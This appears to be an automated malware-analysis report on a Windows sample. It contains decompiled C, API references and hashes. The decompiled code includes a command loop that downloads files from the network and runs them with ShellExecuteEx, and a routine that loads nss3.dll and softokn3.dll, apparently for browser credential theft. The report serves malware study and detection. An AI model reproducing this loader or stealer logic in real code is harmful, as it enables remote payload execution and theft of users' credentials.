				if(E0040A2A0( &_v48, _t63, 0, _t64) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t66 =  *0x453734; // 0x25c6380
				_t67 = E0042BC70(_t66);
				_t187 = _t186 + 4;
				if(E0040A2A0( &_v48, _t66, 0, _t67) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t69 =  *0x4539b8; // 0x25c6368
				_t70 = E0042BC70(_t69);
				_t188 = _t187 + 4;
				if(E0040A2A0( &_v48, _t69, 0, _t70) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t72 =  *0x4534b4; // 0x25c63f8
				_t73 = E0042BC70(_t72);
				_t189 = _t188 + 4;
				if(E0040A2A0( &_v48, _t72, 0, _t73) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t75 =  *0x4538f8; // 0x25c5cc0
				_t76 = E0042BC70(_t75);
				_t190 = _t189 + 4;
				if(E0040A2A0( &_v48, _t75, 0, _t76) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t78 =  *0x453634; // 0x25c6398
				_t79 = E0042BC70(_t78);
				_t191 = _t190 + 4;
				if(E0040A2A0( &_v48, _t78, 0, _t79) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t81 =  *0x453824; // 0x25c6410
				_t82 = E0042BC70(_t81);
				_t192 = _t191 + 4;
				if(E0040A2A0( &_v48, _t81, 0, _t82) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t84 =  *0x4537a8; // 0x25c6350
				_t85 = E0042BC70(_t84);
				_t193 = _t192 + 4;
				if(E0040A2A0( &_v48, _t84, 0, _t85) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t87 =  *0x453b50; // 0x25c6158
				_t88 = E0042BC70(_t87);
				_t194 = _t193 + 4;
				if(E0040A2A0( &_v48, _t87, 0, _t88) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t90 =  *0x4538cc; // 0x25c6278
				_t91 = E0042BC70(_t90);
				_t195 = _t194 + 4;
				if(E0040A2A0( &_v48, _t90, 0, _t91) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t93 =  *0x45395c; // 0x25c1550
				_t94 = E0042BC70(_t93);
				_t196 = _t195 + 4;
				if(E0040A2A0( &_v48, _t93, 0, _t94) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t96 =  *0x4536d0; // 0x25c1560
				_t97 = E0042BC70(_t96);
				_t197 = _t196 + 4;
				if(E0040A2A0( &_v48, _t96, 0, _t97) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t99 =  *0x4537a4; // 0x25c1570
				_t100 = E0042BC70(_t99);
				_t198 = _t197 + 4;
				if(E0040A2A0( &_v48, _t99, 0, _t100) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t102 =  *0x4534b0; // 0x25c6248
				_t103 = E0042BC70(_t102);
				_t199 = _t198 + 4;
				if(E0040A2A0( &_v48, _t102, 0, _t103) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t105 =  *0x453388; // 0x25c6590
				_t106 = E0042BC70(_t105);
				_t200 = _t199 + 4;
				if(E0040A2A0( &_v48, _t105, 0, _t106) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t108 =  *0x45351c; // 0x25c62d8
				_t109 = E0042BC70(_t108);
				_t201 = _t200 + 4;
				if(E0040A2A0( &_v48, _t108, 0, _t109) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t111 =  *0x4539b4; // 0x25c6200
				_t112 = E0042BC70(_t111);
				_t202 = _t201 + 4;
				if(E0040A2A0( &_v48, _t111, 0, _t112) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				if(_v28 >= 0x10) {
					_push(_v48);
					E0042A289();
					_t202 = _t202 + 4;
				}
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				if(_a24 >= 0x10) {
					_t150 = _a4;
					_push(_a4);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t153);
				_pop(_t176);
				_pop(_t120);
				return E0042A36A(_t152, _t120, _v20 ^ _t177, _t150, _t153, _t176);
			}

0x0040b883
0x0040b885
0x0040b890
0x0040b894
0x0040b899
0x0040b89b
0x0040b8a1
0x0040b8a5
0x0040b8b7
0x0040b8ba
0x0040b8bc
0x0040b8c3
0x0040b8c6
0x0040b8c9
0x0040b8d3
0x0040b8d8
0x0040b8ed
0x0040b8ef
0x0040b8ef
0x0040b8f7
0x0040b8fc
0x0040b911
0x0040b913
0x0040b913
0x0040b919
0x0040b91e
0x0040b933
0x0040b935
0x0040b935
0x0040b936
0x0040b93e
0x0040b943
0x0040b954
0x0040b956
0x0040b956
0x0040b957
0x0040b95f
0x0040b964
0x0040b975
0x0040b977
0x0040b977
0x0040b978
0x0040b980
0x0040b985
0x0040b996
0x0040b998
0x0040b998
0x0040b999
0x0040b9a1
0x0040b9a6
0x0040b9b7
0x0040b9b9
0x0040b9b9
0x0040b9ba
0x0040b9c2
0x0040b9c7
0x0040b9d8
0x0040b9da
0x0040b9da
0x0040b9db
0x0040b9e3
0x0040b9e8
0x0040b9f9
0x0040b9fb
0x0040b9fb
0x0040b9fc
0x0040ba04
0x0040ba09
0x0040ba1a
0x0040ba1c
0x0040ba1c
0x0040ba1d
0x0040ba25
0x0040ba2a
0x0040ba3b
0x0040ba3d
0x0040ba3d
0x0040ba3e
0x0040ba46
0x0040ba4b
0x0040ba5c
0x0040ba5e
0x0040ba5e
0x0040ba5f
0x0040ba67
0x0040ba6c
0x0040ba7d
0x0040ba7f
0x0040ba7f
0x0040ba80
0x0040ba88
0x0040ba8d
0x0040ba9e
0x0040baa0
0x0040baa0
0x0040baa1
0x0040baa9
0x0040baae
0x0040babf
0x0040bac1
0x0040bac1
0x0040bac2
0x0040baca
0x0040bacf
0x0040bae0
0x0040bae2
0x0040bae2
0x0040bae3
0x0040baeb
0x0040baf0
0x0040bb01
0x0040bb03
0x0040bb03
0x0040bb04
0x0040bb0c
0x0040bb11
0x0040bb22
0x0040bb24
0x0040bb24
0x0040bb25
0x0040bb2d
0x0040bb32
0x0040bb43
0x0040bb45
0x0040bb45
0x0040bb46
0x0040bb4e
0x0040bb53
0x0040bb64
0x0040bb66
0x0040bb66
0x0040bb67
0x0040bb6f
0x0040bb74
0x0040bb85
0x0040bb87
0x0040bb87
0x0040bb88
0x0040bb90
0x0040bb95
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bba9
0x0040bbb1
0x0040bbb6
0x0040bbc7
0x0040bbc9
0x0040bbc9
0x0040bbd2
0x0040bbd7
0x0040bbd8
0x0040bbdd
0x0040bbdd
0x0040bbe0
0x0040bbe7
0x0040bbea
0x0040bbf0
0x0040bbf2
0x0040bbf5
0x0040bbf6
0x0040bbfb
0x0040bc03
0x0040bc0b
0x0040bc0c
0x0040bc0d
0x0040bc1b

APIs

Part of subcall function 00404AD0: std::_Xinvalid_argument.LIBCPMT ref: 00404AEA

_strlen.LIBCMT ref: 0040B8D3

Part of subcall function 0040A2A0: _memcmp.LIBCMT ref: 0040A2FA

_strlen.LIBCMT ref: 0040B8F7
_strlen.LIBCMT ref: 0040B919
_strlen.LIBCMT ref: 0040B93E
_strlen.LIBCMT ref: 0040B95F
_strlen.LIBCMT ref: 0040B980
_strlen.LIBCMT ref: 0040B9A1
_strlen.LIBCMT ref: 0040B9C2
_strlen.LIBCMT ref: 0040B9E3
_strlen.LIBCMT ref: 0040BA04
_strlen.LIBCMT ref: 0040BA25
_strlen.LIBCMT ref: 0040BA46
_strlen.LIBCMT ref: 0040BA67
_strlen.LIBCMT ref: 0040BA88
_strlen.LIBCMT ref: 0040BAA9
_strlen.LIBCMT ref: 0040BACA
_strlen.LIBCMT ref: 0040BAEB
_strlen.LIBCMT ref: 0040BB0C
_strlen.LIBCMT ref: 0040BB2D
_strlen.LIBCMT ref: 0040BB4E
_strlen.LIBCMT ref: 0040BB6F
_strlen.LIBCMT ref: 0040BB90
_strlen.LIBCMT ref: 0040BBB1

Strings

C:\Windows\, xrefs: 0040B8CE, 0040B8DD
C:\\Windows\, xrefs: 0040B8F2, 0040B901
C:\\\Windows\, xrefs: 0040B914, 0040B923

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$Xinvalid_argument_memcmpstd::_
String ID: C:\Windows\$C:\\Windows\$C:\\\Windows\
API String ID: 3782710559-1289299778
Opcode ID: b70614c77bc542c3cda453ad2117517f79904ac64e05485ffc4efe7030d316d6
Instruction ID: c045f19e8967fcd8c6c1de840125adf115188391fbc7c627f2e4c86744fb229f
Opcode Fuzzy Hash: b70614c77bc542c3cda453ad2117517f79904ac64e05485ffc4efe7030d316d6
Instruction Fuzzy Hash: 36A107F2D001046BD710A67AAC85DAB726CDF16378714427EF825F33E1EA389D1986A9

Uniqueness

Uniqueness Score: -1.00%

Function 004325FD Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004325FD(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x465578 = GetProcAddress(_t35, "FlsAlloc");
					 *0x46557c = GetProcAddress(_t35, "FlsGetValue");
					 *0x465580 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x465578;
					_t39 = TlsSetValue;
					 *0x465584 = _t7;
					if( *0x465578 == 0) {
						L6:
						 *0x46557c = TlsGetValue;
						 *0x465578 = E0043230D;
						 *0x465580 = _t39;
						 *0x465584 = TlsFree;
					} else {
						__eflags =  *0x46557c;
						if( *0x46557c == 0) {
							goto L6;
						} else {
							__eflags =  *0x465580;
							if( *0x465580 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x4523b0 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x46557c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00430E96();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x465578);
							 *0x465578 = _t14;
							_t15 =  *_t41( *0x46557c);
							 *0x46557c = _t15;
							_t16 =  *_t41( *0x465580);
							 *0x465580 = _t16;
							 *0x465584 =  *_t41( *0x465584);
							_t18 = E00433DB1();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0043234A();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x465578, E004324CE);
								 *0x4523ac = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E0042EBB2(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x465580,  *0x4523ac, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00432387(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0043234A();
					return 0;
				}
			}

0x004325fd
0x0043260b
0x0043260f
0x0043262f
0x0043263c
0x00432649
0x0043264e
0x00432650
0x00432657
0x0043265d
0x00432662
0x0043267a
0x0043267f
0x00432689
0x00432693
0x00432699
0x00432664
0x00432664
0x0043266b
0x00000000
0x0043266d
0x0043266d
0x00432674
0x00000000
0x00432676
0x00432676
0x00432678
0x00000000
0x00000000
0x00432678
0x00432674
0x0043266b
0x0043269e
0x004326a4
0x004326a9
0x004326ac
0x00432773
0x00432773
0x00432773
0x004326b2
0x004326b9
0x004326bb
0x004326bd
0x00000000
0x004326c3
0x004326c3
0x004326ce
0x004326d4
0x004326dc
0x004326e1
0x004326e9
0x004326ee
0x004326f6
0x004326fd
0x00432702
0x00432707
0x00432709
0x0043276e
0x0043276e
0x00000000
0x0043270b
0x0043270b
0x0043271e
0x00432720
0x00432725
0x00432728
0x00000000
0x0043272a
0x00432736
0x0043273a
0x0043273c
0x00000000
0x0043273e
0x0043274f
0x00432751
0x00000000
0x00432753
0x00432753
0x00432755
0x00432756
0x0043275d
0x00432763
0x00432767
0x0043276b
0x0043276b
0x00432751
0x0043273c
0x00432728
0x00432709
0x004326bd
0x00432777
0x00432611
0x00432611
0x00432619
0x00432619

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0042E29A), ref: 00432605
__mtterm.LIBCMT ref: 00432611

Part of subcall function 0043234A: DecodePointer.KERNEL32(00000007,00432773,?,0042E29A), ref: 0043235B
Part of subcall function 0043234A: TlsFree.KERNEL32(00000008,00432773,?,0042E29A), ref: 00432375
Part of subcall function 0043234A: DeleteCriticalSection.KERNEL32(00000000,00000000,778DF3A0,?,00432773,?,0042E29A), ref: 00433E18
Part of subcall function 0043234A: _free.LIBCMT ref: 00433E1B
Part of subcall function 0043234A: DeleteCriticalSection.KERNEL32(00000008,778DF3A0,?,00432773,?,0042E29A), ref: 00433E42

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00432627
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00432634
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432641
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0043264E
TlsAlloc.KERNEL32(?,0042E29A), ref: 0043269E
TlsSetValue.KERNEL32(00000000,?,0042E29A), ref: 004326B9
__init_pointers.LIBCMT ref: 004326C3
EncodePointer.KERNEL32(?,0042E29A), ref: 004326D4
EncodePointer.KERNEL32(?,0042E29A), ref: 004326E1
EncodePointer.KERNEL32(?,0042E29A), ref: 004326EE
EncodePointer.KERNEL32(?,0042E29A), ref: 004326FB
DecodePointer.KERNEL32(004324CE,?,0042E29A), ref: 0043271C
__calloc_crt.LIBCMT ref: 00432731
DecodePointer.KERNEL32(00000000,?,0042E29A), ref: 0043274B
GetCurrentThreadId.KERNEL32 ref: 0043275D

Strings

KERNEL32.DLL, xrefs: 00432600
FlsSetValue, xrefs: 00432636
FlsAlloc, xrefs: 00432621
FlsFree, xrefs: 00432643
FlsGetValue, xrefs: 00432629

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 54628e6e2df921212101255de639a0ec2b7d0525f9729c86fad1a1fdfa7dc4fe
Instruction ID: 519b4e0ae8f6ee75b1703b89a103f864cf550946b216f08c6c7d91646ae29061
Opcode Fuzzy Hash: 54628e6e2df921212101255de639a0ec2b7d0525f9729c86fad1a1fdfa7dc4fe
Instruction Fuzzy Hash: B0315075D00B24AFD7106F75AE0DB1A3AA6AB09765F10053BE811D22B4FBF98400DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA70 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 191
stringCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0040AA70(void* __edi, char _a4, intOrPtr _a24) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v1015;
				char _v1016;
				char _v1017;
				char _v1018;
				char _v1019;
				char _v1020;
				char _v2020;
				char _v3020;
				char _v3024;
				void* _v3025;
				char _v3032;
				intOrPtr _v3036;
				char _v3064;
				intOrPtr _v3068;
				char _v3072;
				intOrPtr _v3076;
				char* _v3080;
				char* _v3084;
				char _v3088;
				char _v3092;
				char _v3096;
				void* __ebx;
				void* __esi;
				signed int _t59;
				signed int _t60;
				char* _t64;
				void* _t74;
				void* _t97;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t124;
				signed char* _t126;
				void* _t127;
				char* _t128;
				signed int _t129;
				void* _t130;
				void* _t132;
				void* _t133;
				void* _t135;
				void* _t137;
				char* _t138;

				_t124 = __edi;
				_push(0xffffffff);
				_push(E0043DF58);
				_push( *[fs:0x0]);
				_t59 =  *0x451f00; // 0xc21d6f0a
				_t60 = _t59 ^ _t129;
				_v20 = _t60;
				_push(_t60);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				 *0x453cf0 = 1;
				E0042A2F0( &_v2020, 0, 0x3e8);
				_t64 = _a4;
				_t132 = _t130 - 0xc08 + 0xc;
				_v3024 = 0x3b;
				if(_a24 < 0x10) {
					_t64 =  &_a4;
				}
				_t115 =  &_v3032;
				_t126 = E0042CE7D(0,  &_v3032, _t124, _t64,  &_v3024,  &_v3032);
				_t133 = _t132 + 0xc;
				while(_t126 != 0) {
					_push(_t126);
					if( *0x464758() > 5) {
						E0042A2F0( &_v1020, 0, 0x3e8);
						E0042A2F0( &_v3020, 0, 0x3e8);
						_t135 = _t133 + 0x18;
						_push(_t126);
						if( *0x464758() >= 0) {
							_v1020 =  *_t126 & 0x000000ff;
							_v1019 = _t126[1] & 0x000000ff;
							_v1018 = _t126[2];
							_v1017 = _t126[3] & 0x000000ff;
							_v1016 = _t126[4] & 0x000000ff;
							_v1015 = 0;
						} else {
							_v1020 = 0;
						}
						_t24 =  &(_t126[5]); // 0x5
						 *0x46490c( &_v3020, _t24);
						_t74 =  *0x464890( &_v1020, "open_");
						_t144 = _t74;
						if(_t74 != 0) {
							_t108 =  *0x453978; // 0x25c13d0
							 *0x464860( &_v2020, _t108);
							 *0x464860( &_v2020, E00420520(_t124, __eflags, 0x14));
							_t110 =  *0x4537ac; // 0x25c1518
							 *0x464860( &_v2020, _t110);
							E00414160(_t126,  &_v2020);
							E0042A2F0( &_v3096, 0, 0x3c);
							_v3096 = 0x3c;
							_v3092 = 0;
							_v3088 = 0;
							_v3084 = "open";
							_v3080 =  &_v2020;
							_v3076 = 0x443c1c;
							_v3072 = 0;
							_v3068 = 5;
							_v3064 = 0;
							 *0x4648c4( &_v3096);
							E0042A2F0( &_v3096, 0, 0x3c);
							_t137 = _t135 + 0x20;
						} else {
							_t138 = _t135 - 0x1c;
							_t128 = _t138;
							_v3036 = _t138;
							 *((intOrPtr*)(_t128 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t128 + 0x10)) = 0;
							 *_t128 = 0;
							E00404BC0(_t128, 0x443c1c, E0042BC70(0x443c1c));
							_push( &_v3020);
							E00414330(_t144);
							_t137 = _t138 + 0x24;
						}
						E0042A2F0( &_v2020, 0, 0x3e8);
						E0042A2F0( &_v1020, 0, 0x3e8);
						E0042A2F0( &_v3020, 0, 0x3e8);
						_t115 =  &_v3032;
						_t65 = E0042CE7D(0,  &_v3032, _t124, 0,  &_v3024,  &_v3032);
						_t133 = _t137 + 0x30;
						_t126 = _t65;
					}
				}
				 *0x453cf8 = 1;
				if(_a24 >= 0x10) {
					_push(_a4);
					_t65 = E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t127);
				_pop(_t97);
				return E0042A36A(_t65, _t97, _v20 ^ _t129, _t115, _t124, _t127);
			}

0x0040aa70
0x0040aa73
0x0040aa75
0x0040aa80
0x0040aa87
0x0040aa8c
0x0040aa8e
0x0040aa93
0x0040aa97
0x0040aaac
0x0040aaaf
0x0040aab9
0x0040aabe
0x0040aac1
0x0040aacd
0x0040aad4
0x0040aad6
0x0040aad6
0x0040aad9
0x0040aaed
0x0040aaef
0x0040aaf4
0x0040ab00
0x0040ab0a
0x0040ab1d
0x0040ab2f
0x0040ab34
0x0040ab37
0x0040ab40
0x0040ab4d
0x0040ab57
0x0040ab60
0x0040ab6a
0x0040ab74
0x0040ab7a
0x0040ab42
0x0040ab42
0x0040ab42
0x0040ab80
0x0040ab8b
0x0040ab9d
0x0040aba3
0x0040aba5
0x0040abec
0x0040abfa
0x0040ac15
0x0040ac1b
0x0040ac29
0x0040ac37
0x0040ac46
0x0040ac5b
0x0040ac65
0x0040ac6b
0x0040ac71
0x0040ac7b
0x0040ac81
0x0040ac8b
0x0040ac91
0x0040ac9b
0x0040aca1
0x0040acb1
0x0040acb6
0x0040aba7
0x0040aba7
0x0040abaa
0x0040abac
0x0040abb2
0x0040abb9
0x0040abc1
0x0040abd3
0x0040abde
0x0040abdf
0x0040abe4
0x0040abe4
0x0040acc6
0x0040acd8
0x0040acea
0x0040acef
0x0040acfe
0x0040ad03
0x0040ad06
0x0040ad06
0x0040ad08
0x0040ad14
0x0040ad1e
0x0040ad23
0x0040ad24
0x0040ad29
0x0040ad2f
0x0040ad37
0x0040ad38
0x0040ad46

APIs

_memset.LIBCMT ref: 0040AAB9
_strtok_s.LIBCMT ref: 0040AAE8
lstrlen.KERNEL32(00000000,?,?,?,C21D6F0A,?,00000000), ref: 0040AB01
_memset.LIBCMT ref: 0040AB1D
_memset.LIBCMT ref: 0040AB2F
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,C21D6F0A,?,00000000), ref: 0040AB38
lstrcpy.KERNEL32(?,00000005), ref: 0040AB8B
StrCmpCA.SHLWAPI(?,open_,?,?,?,?,?,?,?,?,?,C21D6F0A,?,00000000), ref: 0040AB9D
_strlen.LIBCMT ref: 0040ABC3
lstrcat.KERNEL32(?,025C13D0), ref: 0040ABFA

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 0040AC15
lstrcat.KERNEL32(?,025C1518), ref: 0040AC29

Part of subcall function 00414160: InternetOpenA.WININET(00443C1C,00000001,00000000,00000000,00000000), ref: 0041419E
Part of subcall function 00414160: StrCmpCA.SHLWAPI(00000000,https), ref: 004141BD
Part of subcall function 00414160: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004141FD
Part of subcall function 00414160: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00414218
Part of subcall function 00414160: StrCmpCA.SHLWAPI(?,200), ref: 0041422E
Part of subcall function 00414160: Sleep.KERNEL32(000003E8), ref: 0041423D
Part of subcall function 00414160: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0041426E
Part of subcall function 00414160: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041428A
Part of subcall function 00414160: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004142B0

_memset.LIBCMT ref: 0040AC46
ShellExecuteEx.SHELL32(C21D6F0A), ref: 0040ACA1
_memset.LIBCMT ref: 0040ACB1
_memset.LIBCMT ref: 0040ACC6
_memset.LIBCMT ref: 0040ACD8
_memset.LIBCMT ref: 0040ACEA
_strtok_s.LIBCMT ref: 0040ACFE

Strings

open, xrefs: 0040AC71
<, xrefs: 0040AC5B
open_, xrefs: 0040AB91

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memset$FileInternetlstrcat$Open_strtok_slstrlen$CountCreateExecuteHttpInfoQueryReadShellSleepTickWrite_malloc_rand_strlenlstrcpywsprintf
String ID: <$open$open_
API String ID: 3741007504-1839743063
Opcode ID: e7f58c80d8e739ff1680b76113a2bb198416233bc62cda0d06783338ead23848
Instruction ID: 2ab0a8d216219a2da5338bd6265af06253a0fe52bb50dbeea4560e1f15ad83ee
Opcode Fuzzy Hash: e7f58c80d8e739ff1680b76113a2bb198416233bc62cda0d06783338ead23848
Instruction Fuzzy Hash: 5271D1B1D002699BDB20DF60DC81FEEB7B8EB04304F4045EEE51963281EB789B848F65

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB80 Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 315
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040EB80(void* __eflags) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v48;
				intOrPtr _v56;
				long _v60;
				char _v76;
				long _v80;
				char _v376;
				char _v380;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t85;
				signed int _t86;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				intOrPtr* _t94;
				intOrPtr* _t102;
				intOrPtr* _t110;
				intOrPtr* _t118;
				intOrPtr* _t126;
				intOrPtr* _t134;
				void* _t147;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t169;
				intOrPtr _t170;
				void* _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				intOrPtr* _t193;
				intOrPtr* _t194;
				intOrPtr* _t195;
				void* _t199;
				signed int _t200;
				void* _t201;
				void* _t203;
				void* _t205;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t216;
				void* _t217;
				void* _t219;
				void* _t220;
				intOrPtr _t223;

				_push(0xffffffff);
				_push(E0043E538);
				_push( *[fs:0x0]);
				_t85 =  *0x451f00; // 0xc21d6f0a
				_t86 = _t85 ^ _t200;
				_v20 = _t86;
				_push(_t86);
				 *[fs:0x0] =  &_v16;
				_t88 =  *0x453978; // 0x25c13d0
				_v56 = 0xf;
				_v60 = 0;
				_v76 = 0;
				_t89 = E0042BC70(_t88);
				_t203 = _t201 - 0x16c + 4;
				_t90 = E00404BC0( &_v76, _t88, _t89);
				_v8 = 0;
				_t223 =  *0x453cfc; // 0x0
				if(_t223 == 0) {
					_t94 = E0040D100(_t223,  &_v48,  &_v76, "vcruntime140.dll");
					_t205 = _t203 + 0xc;
					_v8 = 1;
					if( *((intOrPtr*)(_t94 + 0x14)) < 0x10) {
						_t190 = _t94;
					} else {
						_t190 =  *_t94;
					}
					_t154 =  *0x453c90; // 0x25c8830
					_v380 = 0;
					E00407540(_t154, "vcruntime140.dll", 1,  &_v380,  &_v376);
					HeapAlloc(GetProcessHeap(), 0, _v80);
					_t155 =  *0x453c90; // 0x25c8830
					E004095C0(0, _v80, _t190, 0x10, _t155, _v380, _t190);
					_t207 = _t205 + 0x20;
					_v8 = 0;
					_t225 = _v28 - 0x10;
					if(_v28 >= 0x10) {
						_push(_v48);
						E0042A289();
						_t207 = _t207 + 4;
					}
					_t102 = E0040D100(_t225,  &_v48,  &_v76, "softokn3.dll");
					_t208 = _t207 + 0xc;
					_v8 = 2;
					if( *((intOrPtr*)(_t102 + 0x14)) < 0x10) {
						_t191 = _t102;
					} else {
						_t191 =  *_t102;
					}
					_t157 =  *0x453c90; // 0x25c8830
					_v380 = 0;
					E00407540(_t157, "softokn3.dll", 1,  &_v380,  &_v376);
					HeapAlloc(GetProcessHeap(), 0, _v80);
					_t158 =  *0x453c90; // 0x25c8830
					E004095C0(0, _v80, _t191, 0x10, _t158, _v380, _t191);
					_t210 = _t208 + 0x20;
					_v8 = 0;
					_t227 = _v28 - 0x10;
					if(_v28 >= 0x10) {
						_push(_v48);
						E0042A289();
						_t210 = _t210 + 4;
					}
					_t110 = E0040D100(_t227,  &_v48,  &_v76, "nss3.dll");
					_t211 = _t210 + 0xc;
					_v8 = 3;
					if( *((intOrPtr*)(_t110 + 0x14)) < 0x10) {
						_t192 = _t110;
					} else {
						_t192 =  *_t110;
					}
					_t160 =  *0x453c90; // 0x25c8830
					_v380 = 0;
					E00407540(_t160, "nss3.dll", 1,  &_v380,  &_v376);
					HeapAlloc(GetProcessHeap(), 0, _v80);
					_t161 =  *0x453c90; // 0x25c8830
					E004095C0(0, _v80, _t192, 0x10, _t161, _v380, _t192);
					_t213 = _t211 + 0x20;
					_v8 = 0;
					_t229 = _v28 - 0x10;
					if(_v28 >= 0x10) {
						_push(_v48);
						E0042A289();
						_t213 = _t213 + 4;
					}
					_t118 = E0040D100(_t229,  &_v48,  &_v76, "msvcp140.dll");
					_t214 = _t213 + 0xc;
					_v8 = 4;
					if( *((intOrPtr*)(_t118 + 0x14)) < 0x10) {
						_t193 = _t118;
					} else {
						_t193 =  *_t118;
					}
					_t163 =  *0x453c90; // 0x25c8830
					_v380 = 0;
					E00407540(_t163, "msvcp140.dll", 1,  &_v380,  &_v376);
